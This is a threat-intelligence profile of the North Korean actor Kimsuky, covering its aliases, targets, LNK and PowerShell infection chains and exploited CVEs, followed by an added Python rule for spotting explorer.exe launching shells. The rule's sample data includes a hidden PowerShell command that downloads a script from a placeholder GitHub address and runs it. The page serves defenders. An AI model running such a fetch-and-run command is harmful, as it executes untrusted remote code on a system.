Kimsuky
Kimsuky is a North Korea-linked, state-sponsored threat actor associated with the DPRK Reconnaissance General Bureau. It is tracked under numerous aliases, including APT43, TA406, TA427, Thallium, Velvet Chollima, Emerald Sleet, Opal Sleet, Ruby Sleet, Cerium, Black Banshee, Springtail, Sparkling Pisces, Sharptongue, Osmium, and Konni Group/Konni APT. Proofpoint tracks Kimsuky activity as three separate threat actors: TA406, TA408, and TA427. Reporting generally places Konni Group/TA406 under the broader Kimsuky cluster, though KONNI malware has also been linked to other DPRK-associated actors in some reporting.

The actor conducts cyber espionage and information theft. Reported targets include defense, political, and North Korea-focused individuals; South Korean government officials; NGOs; government agencies; media companies; and Russian Ministry of Foreign Affairs interests. Reporting also describes targeting of Naver-related users and infrastructure, cryptocurrency websites, and technical employees at crypto exchanges in a suspected campaign. Kimsuky is explicitly described as a North Korean state-sponsored threat actor in reporting on intrusions into South Korean government systems.

Kimsuky frequently relies on social engineering and impersonation. Reported personas include a foreign advisor, an embassy employee, a think tank employee, and a Japanese diplomat. In a 2025 campaign simulation attributed to Velvet Chollima, the actor reportedly masqueraded as South Korean government officials, built trust with targets, then sent spear-phishing emails with PDF attachments linking to fake CAPTCHA or device-registration pages. Victims were tricked via ClickFix-style prompts into launching PowerShell as administrator and executing attacker-supplied commands. The group uses multi-stage infection chains and varied delivery formats.
In the GoldDragon cluster, Kimsuky used Word documents, HTML Applications, and CHM files, and abused legitimate Google blog services to host payloads. The campaign objective was information theft, including keyboard input, browser credentials and cookies, and screenshots. The actor minimized exposure of its tooling through server-side victim validation: email verification, IP matching, and a custom user-agent check for the string "chnome" before later-stage payloads were delivered.

Kimsuky-linked malicious LNK campaigns have used work-themed decoys such as a personal information consent form and a file named "260506_한국 핵추진잠수함 협력 전략과 로드맵.pdf.lnk". These LNK files executed obfuscated PowerShell, downloaded additional payloads from external services or GitHub, used fileless execution, opened decoy documents, deleted the original shortcut, and established persistence via Task Scheduler. Observed follow-on payloads included information-stealing PowerShell scripts and backdoor loaders that decrypted and loaded malware into memory. Collected host data included security product information, OS version, network settings, IP addresses, drive information, recently modified files, and running processes.

Persistence and execution techniques reported include creation of new services, PowerShell execution, Windows Run key persistence, and Windows service abuse. One KONNI case used a Windows service for persistence, an AES-CTR-encrypted configuration keyed by the service name, and HTTP-based command execution, file upload/download, and configurable check-in intervals. Reporting also confirms real-world exploitation of CVE-2024-1709 in ConnectWise ScreenConnect by the Kimsuky group.
Infrastructure overlap or suspected links are also noted in reporting on UNC3782 and the Android malware DocSwap, but those links are described as unclear or provisional rather than confirmed.
Tradecraft
56 distinct techniques observed across reporting, grouped by tactic, each with its evidence excerpt and the corresponding MITRE ATT&CK description.
Associated malware families
53 malware families attributed to this actor across reporting.
48 additional families tracked in Mallory.
Associated vulnerabilities
15 CVEs this actor has used in observed campaigns. 15 of them exploited in the wild.
APT28 has used a variety of public exploits, including CVE 2020-0688 ... to gain execution on vulnerable Microsoft Exchange... Dragonfly ... exploited ... CVE-2020-0688 for ... MS Exchange... Kimsuky ... including Microsoft Exchange vulnerability CVE-2020-0688. MuddyWater has exploited the Microsoft Exchange memory corruption vulnerability (CVE-2020-0688). During the SolarWinds Compromise, APT29 exploited CVE-2020-0688 against the Microsoft Exchange Control Panel...
This detection identifies instances where Windows Explorer.exe spawns PowerShell or cmd.exe processes, particularly focusing on executions initiated by LNK files. This behavior is associated with the ZDI-CAN-25373 Windows shortcut zero-day vulnerability, where specially crafted LNK files are used to trigger malicious code execution through cmd.exe or powershell.exe. This technique has been actively exploited by multiple APT groups in targeted attacks through both HTTP and SMB delivery methods.
CVE-2026-21510 (Windows Shell Protection Mechanism Failure)
In two separate campaigns observed by Proofpoint in March and April 2026, DPRK-aligned threat actor TA406 (Opal Sleet) chained CVE-2026-21509 and CVE-2026-21510 within a single attack sequence.
This analytic identifies potential exploitation attempts of ProxyShell (CVE-2021-34473, CVE-2021-34523, CVE-2021-31207) and ProxyNotShell (CVE-2022-41040, CVE-2022-41082) vulnerabilities in Microsoft Exchange Server.
10 more CVEs tied to this actor tracked in Mallory.
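The LNK-to-PowerShell chain described in the profile above and the explorer.exe-spawns-shell detection excerpt in this section can be expressed as one process-creation rule. The following is an added example, not Mallory's code or any vendor's published rule: it assumes Sysmon-style field names (ParentImage, Image, CommandLine) and runs over constructed sample events whose URL is a placeholder, not an indicator from any report.

```python
# Added example, not Mallory's or any vendor's code. Field names are assumptions
# modelled on Sysmon Event ID 1 (ParentImage, Image, CommandLine); data is constructed.
import re
from dataclasses import dataclass, field

SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe"}
# Flags/cmdlets typical of LNK-launched stagers; each hit raises the score by one.
INDICATORS = {
    "encoded_command": r"-(?:e|enc|encodedcommand)\b",
    "hidden_window": r"-w(?:indowstyle)?\s+hidden",
    "no_profile": r"-nop(?:rofile)?\b",
    "bypass_policy": r"-e(?:p|xecutionpolicy)\s+bypass",
    "invoke_expression": r"\biex\b|invoke-expression",
    "remote_fetch": r"downloadstring|downloadfile|invoke-webrequest",
    "lnk_reference": r"\.lnk\b",
    "github_host": r"github\.com|githubusercontent\.com",
}

@dataclass
class Finding:
    pid: int
    score: int           # 1 for the bare explorer.exe -> shell pair, +1 per indicator
    reasons: list = field(default_factory=list)
def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()
def score_event(ev: dict):
    # Return a Finding when explorer.exe launches a shell, else None.
    if _basename(ev.get("ParentImage", "")) != "explorer.exe":
        return None
    if _basename(ev.get("Image", "")) not in SHELLS:
        return None
    cmd = ev.get("CommandLine", "")
    reasons = [k for k, p in INDICATORS.items() if re.search(p, cmd, re.I)]
    return Finding(ev["ProcessId"], 1 + len(reasons), reasons)

def scan(events):
    return [f for f in map(score_event, events) if f is not None]
# Constructed sample telemetry; the URL is a placeholder, not a real indicator.
SAMPLE_EVENTS = [
    {"ProcessId": 4120, "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -nop -w hidden -ep bypass -c \"IEX (New-Object "
                    "Net.WebClient).DownloadString('https://raw.githubusercontent.com/PLACEHOLDER/s.txt')\""},
    {"ProcessId": 4133, "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\cmd.exe", "CommandLine": "cmd.exe /c dir"},
    {"ProcessId": 4150, "ParentImage": r"C:\Windows\System32\svchost.exe",
     "Image": r"C:\Windows\System32\cmd.exe", "CommandLine": "cmd.exe /c whoami"},
]
```

A bare explorer.exe to cmd.exe spawn (score 1) is common user activity; the score only becomes actionable once the command line also carries the hidden-window, policy-bypass and remote-fetch traits the LNK campaigns exhibit.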
Observables
1,390 indicators attributed to this actor: domains, IPs, hashes, and other artifacts pulled from reporting.
Recent activity
20 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
Associated with creating and using malware delivered via a .lnk lure themed around a South Korean nuclear-powered submarine cooperation strategy and roadmap document; the malware is described as Base64-encoded and downloading a dummy file from GitHub.
Referenced in connection with an AhnLab CTI post about a malicious LNK shortcut file disguised as a personal information consent form.
Attributed with a sophisticated intrusion into South Korean government systems, including the Ministry of Foreign Affairs and the Defense Counterintelligence Command.
Associated by similarity with information-theft PowerShell activity using malicious LNK files, external-service-hosted payload delivery, system reconnaissance, persistence via Task Scheduler, and memory-loaded backdoor execution.